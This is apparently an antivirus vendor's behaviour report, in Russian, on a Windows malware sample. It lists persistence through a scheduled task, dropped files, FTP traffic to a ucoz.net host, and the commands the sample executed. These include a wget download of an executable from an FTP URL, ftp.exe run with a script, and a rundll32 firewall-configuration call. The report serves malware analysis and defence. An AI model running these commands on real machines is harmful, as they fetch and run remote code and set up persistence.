Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\_dckwb
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\_dckwb\_dckwb.xml
- %WINDIR%\_dckwb\_dckwb.bat
- %WINDIR%\_dckwb\wget.dat
- nul
- %WINDIR%\_dckwb\_dckwb.exe
- %WINDIR%\_dckwb\temp\_mmeyfb.txt
- %WINDIR%\_dckwb\temp\ftpcommands.txt
Удаляет следующие файлы
- %WINDIR%\_dckwb\temp\ftpcommands.txt
- %WINDIR%\_dckwb\temp\_mmeyfb.txt
Перемещает следующие файлы
- %WINDIR%\_dckwb\_dckwb.exe в %WINDIR%\_dckwb.exe
Сетевая активность
TCP
- 'dc###.ucoz.net':21
UDP
- DNS ASK dc###.ucoz.net
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\_dckwb\wget.dat' -q ftp://ed#######021964b@dckwb.ucoz.net/DckWB/_DckWB.exe
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\_DckWB\_DckWB.bat" "
- '%WINDIR%\syswow64\mode.com' con cols=66 lines=23
- '%WINDIR%\syswow64\chcp.com' 866
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "_DckWB" /xml "%WINDIR%\_DckWB\_DckWB.xml"
- '%WINDIR%\syswow64\schtasks.exe' /delete /tn "_Short" /f
- '%WINDIR%\syswow64\ftp.exe' -s:%WINDIR%\_DckWB\temp\FTPcommands.txt -i dckwb.ucoz.net
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\ftp.exe"
